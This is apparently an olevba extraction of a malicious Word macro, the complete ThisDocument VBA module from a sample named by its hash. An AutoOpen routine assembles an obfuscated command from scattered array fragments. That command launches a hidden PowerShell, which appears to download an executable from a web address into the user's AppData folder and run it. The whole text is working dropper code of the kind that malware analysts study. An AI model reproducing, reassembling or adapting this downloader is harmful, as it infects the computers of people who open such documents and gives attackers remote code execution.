Filename     : ./macros/e1c0178adf7627aca4409fef0cf909c914a041e39cd376280af61821ee52956a
OLE stream   : Macros/VBA/ThisDocument
VBA filename : ThisDocument.cls
----------------------------------------
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
a0 = Array(-4103, -5431, -7900, "e^", -4970, -9787, -4277)(3)
s = Array("n^", -7900, -3710, -8432, -572, -3678, -6214, -8432, -3266)(0)
i6 = Array(-8501, -9133, -3947, "^H", -7264, -1763, -601, -5374, -4837, -9223, -6111, -2699, -385, -7395)(3)
jwo2 = Array(-8068, -8780, -3023, -6157, "^B", -3719, -9241, -2998, -5691, -7458, -5746, -893, -2866, -1598)(4)
ta0 = Array(-1151, -6115, -7507, -943, -8948, -3671, -9100, -6522, " """, -2721, -2408)(8)
olj = Array("-^", -2147, -9604, -7389, -108, -6539, -4118, -3089, -2477, -441)(0)
z2 = Array(-2575, -1698, "sh", -3736, -8884)(2)
ox7 = Array(-9585, -6373, "cM", -3015, -7651, -7514, -341)(2)
hno6 = Array(-513, -5443, -4407, -8274, -4049, "T-", -2778, -3355, -9370)(5)
e0 = Array(-8456, -6239, -7201, "dE", -5386, -1354, -2734, -9480)(3)
hcu4 = Array(-2435, "a%", -712, -5075, -8340, -7657, -7395, -8608, -5691, -7568, -5447, -139)(1)
bne = Array(-4935, -7481, -5672, -2672, -4342, -4494, -1882, -4556, -6509, "nb", -9847, -5445, -7448, -372)(9)
jru7 = Array(-7731, -1458, -1714, -8124, -7514, -8357, "E ", -3096, -5630)(6)
us = Array(-8377, -6677, -6005, "Pd", -7044, -2420, -367, -8033, -273)(3)
dh8 = Array(-7707, "  ", -6965, -4163, -2038)(1)
vo = Array(-752, -2997, "%a", -4540, -2296, -2426)(2)
es9 = Array(-3010, -6355, -6207, -5447, -7088, -8734, -9759, -9131, -2114, "-^", -5156, -4439, -713)(9)
dt = Array(-8565, "'h", -4839, -3899, -2840, -8691, -2094, -8905)(1)
n5 = Array(-8947, -4802, -1366, -5456, -3866, -672, "  ", -7836)(6)
ur = Array(-7179, -9484, "et", -4013, -2230)(2)
ozk = Array(-3293, -8855, -774, -8923, -2460, -8641, -2536, -2721, "e/", -8692, -3376, -6954, -8327)(8)
cb = Array(-4796, -1948, -5066, -1090, -2426, -8666, -5130, -7139, -8911, ")^", -9892, -694)(9)
i = Array(-5141, -2566, "(^", -2836, -3598, -8705, -9937)(2)
hpy7 = Array(-6760, -5818, -4344, "bj", -2671, -2816, -685, -8420, -8600, -6885, -6841, -2851)(3)
me6 = Array(-8321, -6190, -8763, -2630, -6654, -8109, -3173, "  ", -8722, -836, -7862, -1161)(7)
l1 = Array(-6728, "  ", -3081, -5937, -6322, -9569)(1)
idk0 = Array(-8566, -6999, -6636, -2588, -7737, -6860, -8821, -9209, -314, "ni", -2115)(9)
jbo = Array(-3297, -753, -2806, -5135, -9791, -2932, -6163, -8256, -7573, "E ", -9050)(9)
g = Array(-1047, -7973, -9462, " -", -5936, -921, -7194, -7295)(3)
ak = Array(-7751, -6679, -5977, -1623, -6943, -7170, -7712, -6382, -8762, "Er", -7211, -8192, -1505)(9)
uf = Array(-6639, -6510, -1117, "eC", -6657, -8007, -4390, -3731, -2067, -5932, -7317, -4386, -2641, -4078)(3)
ma = Array("IE", -7038, -1280, -9419, -1545, -1300, -1086, -7846, -4335, -6646, -821, -8742)(0)
u0 = Array(-3000, -7214, -6733, "^p", -5559, -7833, -3109, -2405, -1448)(3)
ti6 = Array(-7733, -9999, -9262, "p:", -3678, -8264, -7827, -8417, -2164, -668, -7108, -4158, -9474)(3)
y2 = Array(-2522, -6767, -6821, -1835, "PP", -3423, -1607, -7558, -9827, -1738, -829, -6603)(4)
c = Array(-9265, -2350, -7710, -3775, "^N", -1443, -7064)(4)
g7 = Array(-3098, -400, "  ", -3777)(2)
qi8 = Array(-2128, -7998, -2346, "%.", -2162, -6922, -1961)(3)
amz = Array("pa", -4053, -8795, -8835)(0)
etl4 = Array(-4062, -5141, "XE", -1109, -661, -7560, -4732, -1527, -2598, -654, -3915, -9992)(2)
y4 = Array(-2411, -833, -3229, "/f", -6959, -7383)(3)
um = Array(-1038, -3030, -3723, -4952, "We", -5160, -5851, -1463)(4)
ml = Array(-8852, -495, -1356, -448, -6991, -9279, -553, -9178, -4871, -6006, -1503, -2679, "'""")(12)
eq5 = Array(-3299, "dF", -9993, -7350, -6871, -9506, -1014, -2535, -9662, -6580)(1)
hki = Array(-8439, -4176, "m^", -547, -8383, -5050, -2743)(2)
r = Array("TA", -4954, -741, -9533, -6592, -1470, -6136, -3337, -6193, -2835, -8188)(0)
a3 = Array(-7630, -692, -7939, -5932, -1895, "/C", -4105)(5)
ih6 = Array(-8686, -8015, -9360, -5997, "  ", -865, -167)(4)
olt = Array(-4566, -808, -5590, "l^")(3)
gy = Array(-9706, "r3", -4750, -4054, -7905, -3305, -5881, -4221, -9570)(1)
us8 = Array(-8613, -7364, ".^", -3060, -2166, -6715, -6670, -2001, -4829)(2)
bi5 = Array("ex", -5903, -7417, -2919, -2498, -118, -9496, -7023, -2147, -7494, -9270, -4210)(0)
ha3 = Array(-4838, -5967, -6677, -5180, -3335, -9840, -9808, -3246, -7081, "s^")(9)
da6 = Array(-6400, -3134, -5659, -2974, -4507, -9782, -1130, -4565, -6429, -9099, -3346, "Cl", -9352, -5256)(11)
iht = Array(-5945, -441, -7368, -3262, "^ ")(4)
o = Array(-2791, -8444, -8506, -9095, -7648, -5768, "oL", -2883, -6914, -8019, -594, -690, -9362, -7558)(6)
ca = Array(-1858, -7984, -3780, -8997, -8809, -3626, -1680, "es", -4042, -1747, -8212, -1953, -3123, -4214)(7)
pb9 = Array(-4621, -1571, -3019, -8466, -3714, -4275, -1427, -9713, -1659, -9845, -6178, "TE")(11)
yzz4 = Array(-3141, "bY", -2868, -7926, -9455, -576, -4891, -3618, -2514, -7711, -1199, -1567, -3401, -216)(1)
co3 = Array(-2881, -1503, -5473, "P^")(3)
fk = Array(-4462, "iL", -1537, -5871)(1)
u5 = Array(-2953, -9542, -2191, -9513, "E ")(4)
evl8 = Array("nO", -7700, -5575, -1968, -7499, -9817, -9929, -1164, -4732, -5827, -7855, -8692)(0)
jt6 = Array(-5921, -2487, -7493, -6587, -4005, -4884, -6089, ".e", -7254, -920, -8325, -5652, -3255, -8938)(7)
oz = Array(-866, -5702, -7327, -3062, -8029, -9427, -1420, "DA", -7721, -133, -8924)(7)
gra5 = Array(-8046, -1643, -9429, "v'", -7659, -6161, -7365)(3)
ch = Array("40", -8655, -1495, -1565, -7082, -8355)(0)
yb = Array(-8017, -9679, -981, -6928, "^S", -5714, -2243, -8275, -6967, -8216, -514, -6536, -4629, -6334)(4)
i1 = Array("  ", -9817, -1829, -9086, -5386, -659, -8376)(0)
wfe = Array(-4005, -5432, -9516, -1497, -5362, "e ", -3865, -2536, -832, -2627, -4411)(5)
wy = Array(-7951, -1350, -1178, -3535, -4881, "vr", -3920)(5)
n = Array(-9313, -6656, -4785, -5822, -6503, -230, -3270, -6776, ",'")(8)
k = Array(-1065, -4985, -430, -6779, -6059, -9715, -1440, "ve", -3996, -2407, -8427, -6959, -6035, -6357)(7)
u2 = Array(-4357, -1912, -4273, -403, -1934, -694, -3412, "^T", -8746)(7)
ohh3 = Array(-608, -5745, -943, -6429, "io")(4)
zi = Array(-6410, -9317, -6286, -331, -8249, -9944, "er", -6145)(6)
aq = Array(-8694, -4355, "9.", -6743, -3444, -8310, -4648)(2)
mja8 = Array(-8396, "s ", -3195, -1347, -6192, -2442, -1080, -7016, -6689, -2839, -5000, -469, -1836)(1)
ll = Array("^t", -5551, -1427, -2517, -7246, -377, -9631, -6082, -331, -743, -7860, -8605, -8370)(0)
fma = Array(-2404, "Ss", -9711, -4717)(1)
jg = Array(-1481, -3977, -3657, -7055, "CU", -9531, -5920, -3343, -7335, -6587, -7414)(4)
vne = Array(-714, -2245, ")^", -2431, -4655, -9473, -4256, -691, -4287, -9565, -9991)(2)
ypn = Array(-3555, -6673, -6613, -6763, -9431, -7464, -3317, "^t", -1641, -3571, -6737, -2344, -7733, -2813)(7)
ld = Array(-3756, -5096, -3075, -2704, " ^")(4)
a2 = Array(-9567, "d^", -9737, -2258)(1)
eb9 = Array(-7727, -7219, ";s", -6814, -3941, -9585, -7302, -7549, -1320, -2000, -5575, -4089, -9396)(2)
sb = Array(-5336, -9875, -4019, -1525, "ar", -6110, -5748, -2270)(4)
ed5 = Array(-972, -2265, -2376, ".^", -133, -2214, -4948, -2487, -6911, -6796, -7454, -7902, -9122, -6120)(3)
e8 = Array(-8358, "ew", -5168, -3174, -3500)(1)
h = Array(-9046, -9153, -2957, -8975, -318, -7589, -4803, -8073, -6281, "rO", -9686, -7976, -4578)(9)
igj = Array(-4072, -9584, -6483, "ru", -2727, -1079, -7949, -9710, -9335, -5449, -3151, -4805)(3)
md = Array(-852, -1085, -3265, -5319, -1794, -8755, -8670, -6743, -4722, -845, "EX", -5623)(10)
jm = Array(-1747, -9553, -1672, -2138, "^i", -6662, -7958, -7631)(4)
ob4 = Array(-2280, -5997, -3553, "EL", -9351, -3709, -9835, -8114, -921, -8027)(3)
i2 = Array(-1989, -5931, -9283, -8298, -1754, -8393, "A^", -1619, -4272)(6)
cno2 = Array(-4813, -5408, -9400, -8335, "e'", -2230, -8958, -4691, -7139, -1103, -3897, -3042)(4)
yq6 = Array("T^", -2411, -4063, -9140, -6588)(0)
kcy0 = Array(-5614, -9318, -3586, -4563, -2989, -2686, -1085, -5611, "ow", -4995, -3423, -7723)(8)
al = Array(-8846, "-s", -8673, -4699, -4312, -5439)(1)
ge5 = Array(-8873, -3671, "LO", -9513, -3663, -5664)(2)
u9 = Array(-4607, -7263, -6632, "  ", -4120, -7479)(3)
y = Array(-5232, -8121, "^r", -6632)(2)
fz6 = Array(-2090, -3600, -5888, -2067, -6583, -8887, "Wi", -2368)(6)
i3 = Array(-3087, -6665, -5413, "E^", -3359, -8795, -3551, -966)(3)
wo = Array(-5944, -782, -275, -4595, -8740, -9596, -3754, -2543, -9862, -9243, "^i", -5235, -8306)(10)
q = Array(-939, -4333, -9635, -7322, -6961, -715, -5271, -6672, -9950, -721, -9723, -4755, -4839, "il")(13)
o3 = Array(-4269, -8862, "sY", -9076, -8526, -774, -3349, -8830, -2608, -3944)(2)
wq = Array(-6621, -1765, -792, -4211, -6469, -8766, -492, -6155, -6743, -4971, -8115, "fI")(11)
iwv5 = Array(-794, -2709, -6889, "l^")(3)
v = Array(-5342, -3437, "e(", -9103, -3819)(2)
xju = Array(-803, -4262, -6076, -6755, -8063, "^N", -9426, -5573)(5)
cq = Array(-8912, -7944, -1813, -1937, -9138, -226, -1128, "d.")(7)
fy = Array(-7415, -3009, -750, -3788, -5924, -8302, -1302, "eX")(7)
gpi9 = Array(-9368, -7873, -845, -928, -6659, -773, -1766, "ty")(7)
i9 = Array(-8359, -231, -1682, -8684, -2524, -9912, ".^", -8722, -6376, -8088, -4938, -6318)(6)
an = Array("aP", -6276, -3018, -1877, -7256, -9934, -8467)(0)
ohz0 = Array(-8840, "nd", -4066, -8911, -6035, -1362)(1)
jx0 = Array(-3300, -4789, -2092, -741, "Do", -2102, -895, -5816, -2128, -8597)(4)
a = Array("-O", -3280, -3669, -7062, -6890, -2101, -7534, -569, -8216, -5967)(0)
lh3 = Array(-4816, -4309, -564, -9346, -643, -2167, "^l", -2726, -4788, -2439)(6)
dcu0 = Array(-9587, "N ", -5686, -7196, -6471, -5253)(1)
du = Array(-9867, -8166, -9201, -3165, -656, -6888, "//", -5465, -6765, -1213, -6862, -4044, -8847)(6)
qj0 = Array(-1514, -9694, -6283, -3684, -1513, -7916, -7191, -3127, -5101, -2126, "^P")(10)
u = Array(-2161, -775, -1799, -9368, -8109, -8650, "^p")(6)
d5 = Array(-838, -8792, -3659, -597, -7923, -5673, "x^", -5654, -2363, -6287, -7803, -766, -4171)(6)
ma3 = Array(-424, ".N", -2392, -8330, -138, -3952)(1)
os = Array(-3459, -899, -5167, "Cy", -137, -5569, -8830, -9290, -6959, -3075, -704, -9024, -8920)(3)
ly0 = Array(-4362, -1088, "'%", -7852, -6571)(2)
bru = Array(-101, "t.", -6550, -7350, -3917)(1)
ug = Array(-4610, -7541, -6688, -5146, "oc", -8955)(4)
uk4 = Array(-7910, "oW", -8667, -4639, -9878, -5251, -3526, -2246, -5512)(1)
ki = Array(-2618, -6565, "WN", -1223)(2)
m = Array(-6075, "tt", -7874, -7147)(1)
sxe = Array(-4366, -2620, -2298, "aT")(3)

If ActiveDocument.Kind = 0 Then
cjencyvx = Array(ox7 & cq & fy & jbo & a3 & ta0 & co3 & kcy0 & ak & z2 & ob4 & olt & us8 & md & wfe & ih6 & es9 & i3 & d5 & a0 & jg & yq6 & ohh3 & c & u & o & wo & os & dh8 & i1 & yzz4 & amz & fma & n5 & l1 & ld & olj & evl8 & u0 & h & wq & iwv5 & jru7 & g7 & g & fz6 & ohz0 & uk4 & yb & gpi9 & lh3 & u5 & me6 & u9 & i6 & jm & a2 & e0 & dcu0 & i & s & e8 & a & hpy7 & uf & u2 & iht & o3 & ha3 & pb9 & hki & ma3 & ur & i9 & um & jwo2 & da6 & ma & xju & ypn & cb & ed5 & jx0 & ki & ge5 & i2 & eq5 & fk & v & dt & m & ti6 & du & wy & al & zi & k & gy & ch & aq & igj & y4 & q & ozk & idk0 & bru & bne & gra5 & n & vo & y2 & oz & r & qi8 & bi5 & cno2 & vne & eb9 & ll & sb & hno6 & qj0 & y & ug & ca & mja8 & ly0 & an & us & sxe & hcu4 & jt6 & etl4 & ml)(0)
Shell cjencyvx, vbHide
End If
End Sub
